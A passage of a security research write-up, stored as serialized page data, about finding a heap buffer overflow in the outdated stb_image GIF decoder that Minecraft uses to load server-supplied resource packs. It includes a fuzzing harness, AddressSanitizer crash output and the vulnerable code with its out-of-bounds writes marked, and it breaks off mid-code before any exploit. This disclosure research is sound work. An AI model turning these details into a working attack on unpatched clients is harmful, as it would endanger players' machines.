Packs",{"type":25,"tag":38,"props":151168,"children":151169},{},[151170],{"type":31,"value":151171},"Resource packs are a way to change the look of Minecraft. They specify custom textures and sounds of blocks and entities, while also controlling client-side entity animations.",{"type":25,"tag":38,"props":151173,"children":151174},{},[151175],{"type":31,"value":151176},"A server can provide a custom resource pack to the client upon connecting, which the client can optionally download and load. If the server set the resource pack to mandatory, clients that refuse the resource pack aren't allowed to connect.",{"type":25,"tag":38,"props":151178,"children":151179},{},[151180],{"type":31,"value":151181},"This widens the attack surface to include image and audio parsing - both historically common sources of memory-corruption bugs.",{"type":25,"tag":26,"props":151183,"children":151185},{"id":151184},"finding-a-memory-corruption-bug",[151186],{"type":31,"value":151187},"Finding a Memory Corruption Bug",{"type":25,"tag":38,"props":151189,"children":151190},{},[151191],{"type":31,"value":151192},"Given that Minecraft is a large, closed-source C++ codebase, we wanted to avoid unnecessary reverse engineering; therefore we first looked at the image-parsing code.",{"type":25,"tag":38,"props":151194,"children":151195},{},[151196],{"type":31,"value":151197},"Image parsing is interesting because programs rarely reimplement decoders, they typically use third-party libraries. We hoped Minecraft used an open-source library we could read, which is much easier than reversing a native decoder.",{"type":25,"tag":606,"props":151199,"children":151201},{"id":151200},"locating-image-parsing-code",[151202],{"type":31,"value":151203},"Locating Image Parsing Code",{"type":25,"tag":38,"props":151205,"children":151206},{},[151207,151209,151215,151216,151222],{"type":31,"value":151208},"The simplest way to find code that handles image parsing is to search for expected strings such as ",{"type":25,"tag":82,"props":151210,"children":151212},{"className":151211},[],[151213],{"type":31,"value":151214},"PNG",{"type":31,"value":17090},{"type":25,"tag":82,"props":151217,"children":151219},{"className":151218},[],[151220],{"type":31,"value":151221},"GIF",{"type":31,"value":151223}," and look for error logging or other messages that use those substrings.",{"type":25,"tag":38,"props":151225,"children":151226},{},[151227,151229,151234],{"type":31,"value":151228},"Searching for the string ",{"type":25,"tag":82,"props":151230,"children":151232},{"className":151231},[],[151233],{"type":31,"value":151221},{"type":31,"value":151235}," returned some interesting results:",{"type":25,"tag":38,"props":151237,"children":151238},{},[151239],{"type":25,"tag":6467,"props":151240,"children":151242},{"alt":54547,"src":151241},"/posts/minecraft-heap-overflow-to-rce/image1.png",[],{"type":25,"tag":38,"props":151244,"children":151245},{},[151246,151248,151255,151257,151264],{"type":31,"value":151247},"Most - if not all - of these results look like they are used by an image parser. We searched online for the strings and found they match the exact strings used in ",{"type":25,"tag":162,"props":151249,"children":151252},{"href":151250,"rel":151251},"https://github.com/nothings/stb/blob/fede005abaf93d9d7f3a679d1999b2db341b360f/stb_image.h",[166],[151253],{"type":31,"value":151254},"stb_image.h",{"type":31,"value":151256},". For an example: usage of ",{"type":25,"tag":162,"props":151258,"children":151261},{"href":151259,"rel":151260},"https://github.com/nothings/stb/blob/fede005abaf93d9d7f3a679d1999b2db341b360f/stb_image.h#L6855",[166],[151262],{"type":31,"value":151263},"bad Image Descriptor",{"type":31,"value":179},{"type":25,"tag":38,"props":151266,"children":151267},{},[151268,151270,151277],{"type":31,"value":151269},"To confirm that the library code was actually used to load images, we created a simple resource pack containing a single GIF image, set a breakpoint at ",{"type":25,"tag":162,"props":151271,"children":151274},{"href":151272,"rel":151273},"https://github.com/nothings/stb/blob/fede005abaf93d9d7f3a679d1999b2db341b360f/stb_image.h#L6778",[166],[151275],{"type":31,"value":151276},"stbi__gif_load_next",{"type":31,"value":151278},", and loaded the resource pack - this confirmed its usage:",{"type":25,"tag":38,"props":151280,"children":151281},{},[151282],{"type":25,"tag":6467,"props":151283,"children":151285},{"alt":54547,"src":151284},"/posts/minecraft-heap-overflow-to-rce/image2.png",[],{"type":25,"tag":606,"props":151287,"children":151289},{"id":151288},"stb-image-library",[151290],{"type":31,"value":151291},"STB Image Library",{"type":25,"tag":38,"props":151293,"children":151294},{},[151295,151300],{"type":25,"tag":82,"props":151296,"children":151298},{"className":151297},[],[151299],{"type":31,"value":151254},{"type":31,"value":151301}," had a number of memory corruption bugs historically, but the known ones were fixed in later revisions. Finding a new 0-day in this library looked relatively hard because it’s widely used and has been well-scrutinized at that point.",{"type":25,"tag":38,"props":151303,"children":151304},{},[151305,151307,151312,151314,151321],{"type":31,"value":151306},"Instead, we checked whether the version used by Minecraft was outdated - if so, previously reported bugs might apply. We inspected ",{"type":25,"tag":82,"props":151308,"children":151310},{"className":151309},[],[151311],{"type":31,"value":151254},{"type":31,"value":151313}," commits and checked whether those changes were present in the Minecraft executable. Eventually, we found that Minecraft was using a fairly old revision - some commit prior to ",{"type":25,"tag":162,"props":151315,"children":151318},{"href":151316,"rel":151317},"https://github.com/nothings/stb/commit/f1f077b2722f55e158cba020f0312ee2d13c463a",[166],[151319],{"type":31,"value":151320},"f1f077b2722f55e158cba020f0312ee2d13c463a",{"type":31,"value":179},{"type":25,"tag":38,"props":151323,"children":151324},{},[151325],{"type":31,"value":151326},"At the time, the commit was already 6 years old, while there were public reports for memory corruption bugs after it. We looked through the reported bugs but didn't find an interesting and applicable one, so we decided to run a simple fuzzing harness on this commit.",{"type":25,"tag":630,"props":151328,"children":151330},{"id":151329},"fuzzing",[151331],{"type":31,"value":151332},"Fuzzing",{"type":25,"tag":38,"props":151334,"children":151335},{},[151336,151338,151345],{"type":31,"value":151337},"The fuzzer consisted of a very simple ",{"type":25,"tag":162,"props":151339,"children":151342},{"href":151340,"rel":151341},"https://github.com/AFLplusplus/AFLplusplus",[166],[151343],{"type":31,"value":151344},"AFL++",{"type":31,"value":30699},{"type":25,"tag":206,"props":151347,"children":151349},{"code":151348,"language":2254,"meta":7,"className":20473,"style":7},"#define STB_IMAGE_IMPLEMENTATION\n#include \"./stb/stb_image.h\"\n\nint main(int argc, char **argv) {\n    int x, y, comp;\n    unsigned char *ret;\n\n    if (argc != 2) {\n        return 1;\n    }\n\n    ret = stbi_load(argv[1], &x, &y, &comp, 0);\n    if (ret == NULL) {\n        return 1;\n    }\n    \n    stbi_image_free(ret);\n\n    return 0;\n}\n",[151350],{"type":25,"tag":82,"props":151351,"children":151352},{"__ignoreMap":7},[151353,151366,151378,151385,151431,151443,151464,151471,151495,151510,151517,151524,151596,151620,151635,151642,151649,151662,151669,151684],{"type":25,"tag":216,"props":151354,"children":151355},{"class":6922,"line":6923},[151356,151361],{"type":25,"tag":216,"props":151357,"children":151358},{"style":6973},[151359],{"type":31,"value":151360},"#define",{"type":25,"tag":216,"props":151362,"children":151363},{"style":7047},[151364],{"type":31,"value":151365}," STB_IMAGE_IMPLEMENTATION\n",{"type":25,"tag":216,"props":151367,"children":151368},{"class":6922,"line":6769},[151369,151373],{"type":25,"tag":216,"props":151370,"children":151371},{"style":6973},[151372],{"type":31,"value":94386},{"type":25,"tag":216,"props":151374,"children":151375},{"style":8205},[151376],{"type":31,"value":151377}," \"./stb/stb_image.h\"\n",{"type":25,"tag":216,"props":151379,"children":151380},{"class":6922,"line":6778},[151381],{"type":25,"tag":216,"props":151382,"children":151383},{"emptyLinePlaceholder":16},[151384],{"type":31,"value":7642},{"type":25,"tag":216,"props":151386,"children":151387},{"class":6922,"line":7005},[151388,151392,151396,151400,151404,151409,151413,151418,151422,151427],{"type":25,"tag":216,"props":151389,"children":151390},{"style":6936},[151391],{"type":31,"value":23007},{"type":25,"tag":216,"props":151393,"children":151394},{"style":7047},[151395],{"type":31,"value":94751},{"type":25,"tag":216,"props":151397,"children":151398},{"style":6964},[151399],{"type":31,"value":1850},{"type":25,"tag":216,"props":151401,"children":151402},{"style":6936},[151403],{"type":31,"value":23007},{"type":25,"tag":216,"props":151405,"children":151406},{"style":6947},[151407],{"type":31,"value":151408}," argc",{"type":25,"tag":216,"props":151410,"children":151411},{"style":6964},[151412],{"type":31,"value":7026},{"type":25,"tag":216,"props":151414,"children":151415},{"style":6936},[151416],{"type":31,"value":151417},"char",{"type":25,"tag":216,"props":151419,"children":151420},{"style":6953},[151421],{"type":31,"value":93852},{"type":25,"tag":216,"props":151423,"children":151424},{"style":6947},[151425],{"type":31,"value":151426},"argv",{"type":25,"tag":216,"props":151428,"children":151429},{"style":6964},[151430],{"type":31,"value":18761},{"type":25,"tag":216,"props":151432,"children":151433},{"class":6922,"line":7110},[151434,151438],{"type":25,"tag":216,"props":151435,"children":151436},{"style":6936},[151437],{"type":31,"value":23037},{"type":25,"tag":216,"props":151439,"children":151440},{"style":6964},[151441],{"type":31,"value":151442}," x, y, comp;\n",{"type":25,"tag":216,"props":151444,"children":151445},{"class":6922,"line":7216},[151446,151451,151455,151459],{"type":25,"tag":216,"props":151447,"children":151448},{"style":6936},[151449],{"type":31,"value":151450},"    unsigned",{"type":25,"tag":216,"props":151452,"children":151453},{"style":6936},[151454],{"type":31,"value":63016},{"type":25,"tag":216,"props":151456,"children":151457},{"style":6953},[151458],{"type":31,"value":13773},{"type":25,"tag":216,"props":151460,"children":151461},{"style":6964},[151462],{"type":31,"value":151463},"ret;\n",{"type":25,"tag":216,"props":151465,"children":151466},{"class":6922,"line":7244},[151467],{"type":25,"tag":216,"props":151468,"children":151469},{"emptyLinePlaceholder":16},[151470],{"type":31,"value":7642},{"type":25,"tag":216,"props":151472,"children":151473},{"class":6922,"line":7257},[151474,151478,151483,151487,151491],{"type":25,"tag":216,"props":151475,"children":151476},{"style":6973},[151477],{"type":31,"value":16235},{"type":25,"tag":216,"props":151479,"children":151480},{"style":6964},[151481],{"type":31,"value":151482}," (argc ",{"type":25,"tag":216,"props":151484,"children":151485},{"style":6953},[151486],{"type":31,"value":19646},{"type":25,"tag":216,"props":151488,"children":151489},{"style":6989},[151490],{"type":31,"value":11886},{"type":25,"tag":216,"props":151492,"children":151493},{"style":6964},[151494],{"type":31,"value":18761},{"type":25,"tag":216,"props":151496,"children":151497},{"class":6922,"line":7275},[151498,151502,151506],{"type":25,"tag":216,"props":151499,"children":151500},{"style":6973},[151501],{"type":31,"value":19702},{"type":25,"tag":216,"props":151503,"children":151504},{"style":6989},[151505],{"type":31,"value":8471},{"type":25,"tag":216,"props":151507,"children":151508},{"style":6964},[151509],{"type":31,"value":6967},{"type":25,"tag":216,"props":151511,"children":151512},{"class":6922,"line":7296},[151513],{"type":25,"tag":216,"props":151514,"children":151515},{"style":6964},[151516],{"type":31,"value":7311},{"type":25,"tag":216,"props":151518,"children":151519},{"class":6922,"line":7305},[151520],{"type":25,"tag":216,"props":151521,"children":151522},{"emptyLinePlaceholder":16},[151523],{"type":31,"value":7642},{"type":25,"tag":216,"props":151525,"children":151526},{"class":6922,"line":7557},[151527,151532,151536,151541,151545,151549,151553,151557,151561,151565,151570,151574,151579,151583,151588,151592],{"type":25,"tag":216,"props":151528,"children":151529},{"style":6964},[151530],{"type":31,"value":151531},"    ret ",{"type":25,"tag":216,"props":151533,"children":151534},{"style":6953},[151535],{"type":31,"value":266},{"type":25,"tag":216,"props":151537,"children":151538},{"style":7047},[151539],{"type":31,"value":151540}," stbi_load",{"type":25,"tag":216,"props":151542,"children":151543},{"style":6964},[151544],{"type":31,"value":1850},{"type":25,"tag":216,"props":151546,"children":151547},{"style":6947},[151548],{"type":31,"value":151426},{"type":25,"tag":216,"props":151550,"children":151551},{"style":6964},[151552],{"type":31,"value":7701},{"type":25,"tag":216,"props":151554,"children":151555},{"style":6989},[151556],{"type":31,"value":184},{"type":25,"tag":216,"props":151558,"children":151559},{"style":6964},[151560],{"type":31,"value":27006},{"type":25,"tag":216,"props":151562,"children":151563},{"style":6953},[151564],{"type":31,"value":7059},{"type":25,"tag":216,"props":151566,"children":151567},{"style":6964},[151568],{"type":31,"value":151569},"x, ",{"type":25,"tag":216,"props":151571,"children":151572},{"style":6953},[151573],{"type":31,"value":7059},{"type":25,"tag":216,"props":151575,"children":151576},{"style":6964},[151577],{"type":31,"value":151578},"y, ",{"type":25,"tag":216,"props":151580,"children":151581},{"style":6953},[151582],{"type":31,"value":7059},{"type":25,"tag":216,"props":151584,"children":151585},{"style":6964},[151586],{"type":31,"value":151587},"comp, ",{"type":25,"tag":216,"props":151589,"children":151590},{"style":6989},[151591],{"type":31,"value":1882},{"type":25,"tag":216,"props":151593,"children":151594},{"style":6964},[151595],{"type":31,"value":7797},{"type":25,"tag":216,"props":151597,"children":151598},{"class":6922,"line":7574},[151599,151603,151608,151612,151616],{"type":25,"tag":216,"props":151600,"children":151601},{"style":6973},[151602],{"type":31,"value":16235},{"type":25,"tag":216,"props":151604,"children":151605},{"style":6964},[151606],{"type":31,"value":151607}," (ret ",{"type":25,"tag":216,"props":151609,"children":151610},{"style":6953},[151611],{"type":31,"value":12528},{"type":25,"tag":216,"props":151613,"children":151614},{"style":6936},[151615],{"type":31,"value":131702},{"type":25,"tag":216,"props":151617,"children":151618},{"style":6964},[151619],{"type":31,"value":18761},{"type":25,"tag":216,"props":151621,"children":151622},{"class":6922,"line":7591},[151623,151627,151631],{"type":25,"tag":216,"props":151624,"children":151625},{"style":6973},[151626],{"type":31,"value":19702},{"type":25,"tag":216,"props":151628,"children":151629},{"style":6989},[151630],{"type":31,"value":8471},{"type":25,"tag":216,"props":151632,"children":151633},{"style":6964},[151634],{"type":31,"value":6967},{"type":25,"tag":216,"props":151636,"children":151637},{"class":6922,"line":7604},[151638],{"type":25,"tag":216,"props":151639,"children":151640},{"style":6964},[151641],{"type":31,"value":7311},{"type":25,"tag":216,"props":151643,"children":151644},{"class":6922,"line":7613},[151645],{"type":25,"tag":216,"props":151646,"children":151647},{"style":6964},[151648],{"type":31,"value":65754},{"type":25,"tag":216,"props":151650,"children":151651},{"class":6922,"line":7636},[151652,151657],{"type":25,"tag":216,"props":151653,"children":151654},{"style":7047},[151655],{"type":31,"value":151656},"    stbi_image_free",{"type":25,"tag":216,"props":151658,"children":151659},{"style":6964},[151660],{"type":31,"value":151661},"(ret);\n",{"type":25,"tag":216,"props":151663,"children":151664},{"class":6922,"line":7645},[151665],{"type":25,"tag":216,"props":151666,"children":151667},{"emptyLinePlaceholder":16},[151668],{"type":31,"value":7642},{"type":25,"tag":216,"props":151670,"children":151671},{"class":6922,"line":7654},[151672,151676,151680],{"type":25,"tag":216,"props":151673,"children":151674},{"style":6973},[151675],{"type":31,"value":20947},{"type":25,"tag":216,"props":151677,"children":151678},{"style":6989},[151679],{"type":31,"value":6992},{"type":25,"tag":216,"props":151681,"children":151682},{"style":6964},[151683],{"type":31,"value":6967},{"type":25,"tag":216,"props":151685,"children":151686},{"class":6922,"line":7722},[151687],{"type":25,"tag":216,"props":151688,"children":151689},{"style":6964},[151690],{"type":31,"value":7874},{"type":25,"tag":38,"props":151692,"children":151693},{},[151694],{"type":31,"value":151695},"And soon after starting the fuzzer it found an interesting bug:",{"type":25,"tag":206,"props":151697,"children":151699},{"code":151698},"=================================================================\n==1087247==ERROR: AddressSanitizer: heap-buffer-overflow on address ...\nWRITE of size 1 at 0x52d000008800 thread T0\n    #0 0x655424309a49 in stbi__out_gif_code stb/stb_image.h:6233\n    #1 0x655424309888 in stbi__out_gif_code stb/stb_image.h:6227\n    #2 0x655424309888 in stbi__out_gif_code stb/stb_image.h:6227\n    [...]\n    #19 0x65542430a697 in stbi__process_gif_raster stb/stb_image.h:6326\n    #20 0x65542430b936 in stbi__gif_load_next stb/stb_image.h:6443\n    #21 0x65542430c90e in stbi__gif_load stb/stb_image.h:6573\n    #22 0x6554242fc0d4 in stbi__load_main stb/stb_image.h:989\n    #23 0x6554242fc927 in stbi__load_and_postprocess_8bit stb/stb_image.h:1088\n    #24 0x6554242fd34f in stbi_load_from_file stb/stb_image.h:1174\n    #25 0x6554242fd22c in stbi_load stb/stb_image.h:1164\n    [...]\n",[151700],{"type":25,"tag":82,"props":151701,"children":151702},{"__ignoreMap":7},[151703],{"type":31,"value":151698},{"type":25,"tag":630,"props":151705,"children":151707},{"id":151706},"investigating-the-finding",[151708],{"type":31,"value":151709},"Investigating the Finding",{"type":25,"tag":38,"props":151711,"children":151712},{},[151713,151715,151721,151722,151727],{"type":31,"value":151714},"The ASAN output shows that at line ",{"type":25,"tag":82,"props":151716,"children":151718},{"className":151717},[],[151719],{"type":31,"value":151720},"6233",{"type":31,"value":147221},{"type":25,"tag":82,"props":151723,"children":151725},{"className":151724},[],[151726],{"type":31,"value":151254},{"type":31,"value":151728}," an attempt was made to write a single byte out-of-bounds. Looking at the nearby source:",{"type":25,"tag":206,"props":151730,"children":151732},{"code":151731,"language":2254,"meta":7,"className":20473,"style":7},"static void stbi__out_gif_code(stbi__gif *g, stbi__uint16 code)\n{\n   stbi_uc *p, *c;\n   int idx; \n\n   [...]\n\n   if (g->cur_y >= g->max_y) return;\n\n   idx = g->cur_x + g->cur_y; \n   p = &g->out[idx];\n   g->history[idx / 4] = 1;          // OOB write\n",[151733],{"type":25,"tag":82,"props":151734,"children":151735},{"__ignoreMap":7},[151736,151778,151785,151811,151824,151831,151839,151846,151900,151907,151953,151986],{"type":25,"tag":216,"props":151737,"children":151738},{"class":6922,"line":6923},[151739,151743,151747,151752,151757,151761,151765,151770,151774],{"type":25,"tag":216,"props":151740,"children":151741},{"style":6936},[151742],{"type":31,"value":55013},{"type":25,"tag":216,"props":151744,"children":151745},{"style":6936},[151746],{"type":31,"value":55018},{"type":25,"tag":216,"props":151748,"children":151749},{"style":7047},[151750],{"type":31,"value":151751}," stbi__out_gif_code",{"type":25,"tag":216,"props":151753,"children":151754},{"style":6964},[151755],{"type":31,"value":151756},"(stbi__gif ",{"type":25,"tag":216,"props":151758,"children":151759},{"style":6953},[151760],{"type":31,"value":8519},{"type":25,"tag":216,"props":151762,"children":151763},{"style":6947},[151764],{"type":31,"value":113250},{"type":25,"tag":216,"props":151766,"children":151767},{"style":6964},[151768],{"type":31,"value":151769},", stbi__uint16 ",{"type":25,"tag":216,"props":151771,"children":151772},{"style":6947},[151773],{"type":31,"value":82},{"type":25,"tag":216,"props":151775,"children":151776},{"style":6964},[151777],{"type":31,"value":7107},{"type":25,"tag":216,"props":151779,"children":151780},{"class":6922,"line":6769},[151781],{"type":25,"tag":216,"props":151782,"children":151783},{"style":6964},[151784],{"type":31,"value":14836},{"type":25,"tag":216,"props":151786,"children":151787},{"class":6922,"line":6778},[151788,151793,151797,151802,151806],{"type":25,"tag":216,"props":151789,"children":151790},{"style":6964},[151791],{"type":31,"value":151792},"   stbi_uc ",{"type":25,"tag":216,"props":151794,"children":151795},{"style":6953},[151796],{"type":31,"value":8519},{"type":25,"tag":216,"props":151798,"children":151799},{"style":6964},[151800],{"type":31,"value":151801},"p, ",{"type":25,"tag":216,"props":151803,"children":151804},{"style":6953},[151805],{"type":31,"value":8519},{"type":25,"tag":216,"props":151807,"children":151808},{"style":6964},[151809],{"type":31,"value":151810},"c;\n",{"type":25,"tag":216,"props":151812,"children":151813},{"class":6922,"line":7005},[151814,151819],{"type":25,"tag":216,"props":151815,"children":151816},{"style":6936},[151817],{"type":31,"value":151818},"   int",{"type":25,"tag":216,"props":151820,"children":151821},{"style":6964},[151822],{"type":31,"value":151823}," idx; \n",{"type":25,"tag":216,"props":151825,"children":151826},{"class":6922,"line":7110},[151827],{"type":25,"tag":216,"props":151828,"children":151829},{"emptyLinePlaceholder":16},[151830],{"type":31,"value":7642},{"type":25,"tag":216,"props":151832,"children":151833},{"class":6922,"line":7216},[151834],{"type":25,"tag":216,"props":151835,"children":151836},{"style":6964},[151837],{"type":31,"value":151838},"   [...]\n",{"type":25,"tag":216,"props":151840,"children":151841},{"class":6922,"line":7244},[151842],{"type":25,"tag":216,"props":151843,"children":151844},{"emptyLinePlaceholder":16},[151845],{"type":31,"value":7642},{"type":25,"tag":216,"props":151847,"children":151848},{"class":6922,"line":7257},[151849,151853,151857,151861,151865,151870,151874,151879,151883,151888,151892,151896],{"type":25,"tag":216,"props":151850,"children":151851},{"style":6973},[151852],{"type":31,"value":56612},{"type":25,"tag":216,"props":151854,"children":151855},{"style":6964},[151856],{"type":31,"value":7016},{"type":25,"tag":216,"props":151858,"children":151859},{"style":6947},[151860],{"type":31,"value":113250},{"type":25,"tag":216,"props":151862,"children":151863},{"style":6964},[151864],{"type":31,"value":17714},{"type":25,"tag":216,"props":151866,"children":151867},{"style":6947},[151868],{"type":31,"value":151869},"cur_y",{"type":25,"tag":216,"props":151871,"children":151872},{"style":6953},[151873],{"type":31,"value":12254},{"type":25,"tag":216,"props":151875,"children":151876},{"style":6947},[151877],{"type":31,"value":151878}," g",{"type":25,"tag":216,"props":151880,"children":151881},{"style":6964},[151882],{"type":31,"value":17714},{"type":25,"tag":216,"props":151884,"children":151885},{"style":6947},[151886],{"type":31,"value":151887},"max_y",{"type":25,"tag":216,"props":151889,"children":151890},{"style":6964},[151891],{"type":31,"value":7036},{"type":25,"tag":216,"props":151893,"children":151894},{"style":6973},[151895],{"type":31,"value":52426},{"type":25,"tag":216,"props":151897,"children":151898},{"style":6964},[151899],{"type":31,"value":6967},{"type":25,"tag":216,"props":151901,"children":151902},{"class":6922,"line":7275},[151903],{"type":25,"tag":216,"props":151904,"children":151905},{"emptyLinePlaceholder":16},[151906],{"type":31,"value":7642},{"type":25,"tag":216,"props":151908,"children":151909},{"class":6922,"line":7296},[151910,151915,151919,151923,151927,151932,151936,151940,151944,151948],{"type":25,"tag":216,"props":151911,"children":151912},{"style":6964},[151913],{"type":31,"value":151914},"   idx ",{"type":25,"tag":216,"props":151916,"children":151917},{"style":6953},[151918],{"type":31,"value":266},{"type":25,"tag":216,"props":151920,"children":151921},{"style":6947},[151922],{"type":31,"value":151878},{"type":25,"tag":216,"props":151924,"children":151925},{"style":6964},[151926],{"type":31,"value":17714},{"type":25,"tag":216,"props":151928,"children":151929},{"style":6947},[151930],{"type":31,"value":151931},"cur_x",{"type":25,"tag":216,"props":151933,"children":151934},{"style":6953},[151935],{"type":31,"value":12858},{"type":25,"tag":216,"props":151937,"children":151938},{"style":6947},[151939],{"type":31,"value":151878},{"type":25,"tag":216,"props":151941,"children":151942},{"style":6964},[151943],{"type":31,"value":17714},{"type":25,"tag":216,"props":151945,"children":151946},{"style":6947},[151947],{"type":31,"value":151869},{"type":25,"tag":216,"props":151949,"children":151950},{"style":6964},[151951],{"type":31,"value":151952},"; \n",{"type":25,"tag":216,"props":151954,"children":151955},{"class":6922,"line":7305},[151956,151961,151965,151969,151973,151977,151981],{"type":25,"tag":216,"props":151957,"children":151958},{"style":6964},[151959],{"type":31,"value":151960},"   p ",{"type":25,"tag":216,"props":151962,"children":151963},{"style":6953},[151964],{"type":31,"value":266},{"type":25,"tag":216,"props":151966,"children":151967},{"style":6953},[151968],{"type":31,"value":11093},{"type":25,"tag":216,"props":151970,"children":151971},{"style":6947},[151972],{"type":31,"value":113250},{"type":25,"tag":216,"props":151974,"children":151975},{"style":6964},[151976],{"type":31,"value":17714},{"type":25,"tag":216,"props":151978,"children":151979},{"style":6947},[151980],{"type":31,"value":122657},{"type":25,"tag":216,"props":151982,"children":151983},{"style":6964},[151984],{"type":31,"value":151985},"[idx];\n",{"type":25,"tag":216,"props":151987,"children":151988},{"class":6922,"line":7557},[151989,151994,151998,152003,152008,152012,152016,152020,152024,152028,152032],{"type":25,"tag":216,"props":151990,"children":151991},{"style":6947},[151992],{"type":31,"value":151993},"   g",{"type":25,"tag":216,"props":151995,"children":151996},{"style":6964},[151997],{"type":31,"value":17714},{"type":25,"tag":216,"props":151999,"children":152000},{"style":6947},[152001],{"type":31,"value":152002},"history",{"type":25,"tag":216,"props":152004,"children":152005},{"style":6964},[152006],{"type":31,"value":152007},"[idx ",{"type":25,"tag":216,"props":152009,"children":152010},{"style":6953},[152011],{"type":31,"value":5755},{"type":25,"tag":216,"props":152013,"children":152014},{"style":6989},[152015],{"type":31,"value":15701},{"type":25,"tag":216,"props":152017,"children":152018},{"style":6964},[152019],{"type":31,"value":12614},{"type":25,"tag":216,"props":152021,"children":152022},{"style":6953},[152023],{"type":31,"value":266},{"type":25,"tag":216,"props":152025,"children":152026},{"style":6989},[152027],{"type":31,"value":8471},{"type":25,"tag":216,"props":152029,"children":152030},{"style":6964},[152031],{"type":31,"value":53043},{"type":25,"tag":216,"props":152033,"children":152034},{"style":6927},[152035],{"type":31,"value":152036},"          // OOB write\n",{"type":25,"tag":38,"props":152038,"children":152039},{},[152040,152042,152047,152049,152055,152057,152063],{"type":31,"value":152041},"It’s reasonable to assume ",{"type":25,"tag":82,"props":152043,"children":152045},{"className":152044},[],[152046],{"type":31,"value":80489},{"type":31,"value":152048}," is outside the bounds of ",{"type":25,"tag":82,"props":152050,"children":152052},{"className":152051},[],[152053],{"type":31,"value":152054},"g->history",{"type":31,"value":152056},", which leads to a one-byte OOB write (",{"type":25,"tag":82,"props":152058,"children":152060},{"className":152059},[],[152061],{"type":31,"value":152062},"g->history[idx / 4] = 1",{"type":31,"value":152064},"). That single-byte OOB is hard to exploit remotely, but it was the only corruption observed initially, so we investigated further.",{"type":25,"tag":38,"props":152066,"children":152067},{},[152068,152070,152075,152077,152083,152085,152090,152092,152098,152100,152106],{"type":31,"value":152069},"Because ",{"type":25,"tag":82,"props":152071,"children":152073},{"className":152072},[],[152074],{"type":31,"value":38},{"type":31,"value":152076}," is computed from ",{"type":25,"tag":82,"props":152078,"children":152080},{"className":152079},[],[152081],{"type":31,"value":152082},"g->out[idx]",{"type":31,"value":152084}," immediately before the violation, we considered whether ",{"type":25,"tag":82,"props":152086,"children":152088},{"className":152087},[],[152089],{"type":31,"value":80489},{"type":31,"value":152091}," could also be OOB for ",{"type":25,"tag":82,"props":152093,"children":152095},{"className":152094},[],[152096],{"type":31,"value":152097},"g->out",{"type":31,"value":152099},". Note that computing the address ",{"type":25,"tag":82,"props":152101,"children":152103},{"className":152102},[],[152104],{"type":31,"value":152105},"&g->out[idx]",{"type":31,"value":152107}," does not itself access the memory, so ASAN wouldn’t flag it.",{"type":25,"tag":38,"props":152109,"children":152110},{},[152111,152113,152118],{"type":31,"value":152112},"If we comment out ",{"type":25,"tag":82,"props":152114,"children":152116},{"className":152115},[],[152117],{"type":31,"value":152062},{"type":31,"value":152119}," and re-run the fuzzing input, ASAN reports another violation in the same function at a different line:",{"type":25,"tag":206,"props":152121,"children":152123},{"code":152122},"=================================================================\n==8578==ERROR: AddressSanitizer: heap-buffer-overflow on address ...\nWRITE of size 1 at 0x7f0fe6e6c800 thread T0\n    #0 0x5d54e32a4315 in stbi__out_gif_code stb/stb_image.h:6237\n    [...]\n",[152124],{"type":25,"tag":82,"props":152125,"children":152126},{"__ignoreMap":7},[152127],{"type":31,"value":152122},{"type":25,"tag":38,"props":152129,"children":152130},{},[152131],{"type":31,"value":152132},"This corresponds to:",{"type":25,"tag":206,"props":152134,"children":152136},{"code":152135,"language":2254,"meta":7,"className":20473,"style":7},"static void stbi__out_gif_code(stbi__gif *g, stbi__uint16 code)\n{\n   [...]\n\n   idx = g->cur_x + g->cur_y; \n   p = &g->out[idx];\n   g->history[idx / 4] = 1;  \n\n   c = &g->color_table[g->codes[code].suffix * 4];\n   if (c[3] > 128) {\n      p[0] = c[2];        // OOB write\n      p[1] = c[1];\n      p[2] = c[0];\n      p[3] = c[3];\n   }\n",[152137],{"type":25,"tag":82,"props":152138,"children":152139},{"__ignoreMap":7},[152140,152179,152186,152193,152200,152243,152274,152318,152325,152393,152433,152478,152517,152556,152595],{"type":25,"tag":216,"props":152141,"children":152142},{"class":6922,"line":6923},[152143,152147,152151,152155,152159,152163,152167,152171,152175],{"type":25,"tag":216,"props":152144,"children":152145},{"style":6936},[152146],{"type":31,"value":55013},{"type":25,"tag":216,"props":152148,"children":152149},{"style":6936},[152150],{"type":31,"value":55018},{"type":25,"tag":216,"props":152152,"children":152153},{"style":7047},[152154],{"type":31,"value":151751},{"type":25,"tag":216,"props":152156,"children":152157},{"style":6964},[152158],{"type":31,"value":151756},{"type":25,"tag":216,"props":152160,"children":152161},{"style":6953},[152162],{"type":31,"value":8519},{"type":25,"tag":216,"props":152164,"children":152165},{"style":6947},[152166],{"type":31,"value":113250},{"type":25,"tag":216,"props":152168,"children":152169},{"style":6964},[152170],{"type":31,"value":151769},{"type":25,"tag":216,"props":152172,"children":152173},{"style":6947},[152174],{"type":31,"value":82},{"type":25,"tag":216,"props":152176,"children":152177},{"style":6964},[152178],{"type":31,"value":7107},{"type":25,"tag":216,"props":152180,"children":152181},{"class":6922,"line":6769},[152182],{"type":25,"tag":216,"props":152183,"children":152184},{"style":6964},[152185],{"type":31,"value":14836},{"type":25,"tag":216,"props":152187,"children":152188},{"class":6922,"line":6778},[152189],{"type":25,"tag":216,"props":152190,"children":152191},{"style":6964},[152192],{"type":31,"value":151838},{"type":25,"tag":216,"props":152194,"children":152195},{"class":6922,"line":7005},[152196],{"type":25,"tag":216,"props":152197,"children":152198},{"emptyLinePlaceholder":16},[152199],{"type":31,"value":7642},{"type":25,"tag":216,"props":152201,"children":152202},{"class":6922,"line":7110},[152203,152207,152211,152215,152219,152223,152227,152231,152235,152239],{"type":25,"tag":216,"props":152204,"children":152205},{"style":6964},[152206],{"type":31,"value":151914},{"type":25,"tag":216,"props":152208,"children":152209},{"style":6953},[152210],{"type":31,"value":266},{"type":25,"tag":216,"props":152212,"children":152213},{"style":6947},[152214],{"type":31,"value":151878},{"type":25,"tag":216,"props":152216,"children":152217},{"style":6964},[152218],{"type":31,"value":17714},{"type":25,"tag":216,"props":152220,"children":152221},{"style":6947},[152222],{"type":31,"value":151931},{"type":25,"tag":216,"props":152224,"children":152225},{"style":6953},[152226],{"type":31,"value":12858},{"type":25,"tag":216,"props":152228,"children":152229},{"style":6947},[152230],{"type":31,"value":151878},{"type":25,"tag":216,"props":152232,"children":152233},{"style":6964},[152234],{"type":31,"value":17714},{"type":25,"tag":216,"props":152236,"children":152237},{"style":6947},[152238],{"type":31,"value":151869},{"type":25,"tag":216,"props":152240,"children":152241},{"style":6964},[152242],{"type":31,"value":151952},{"type":25,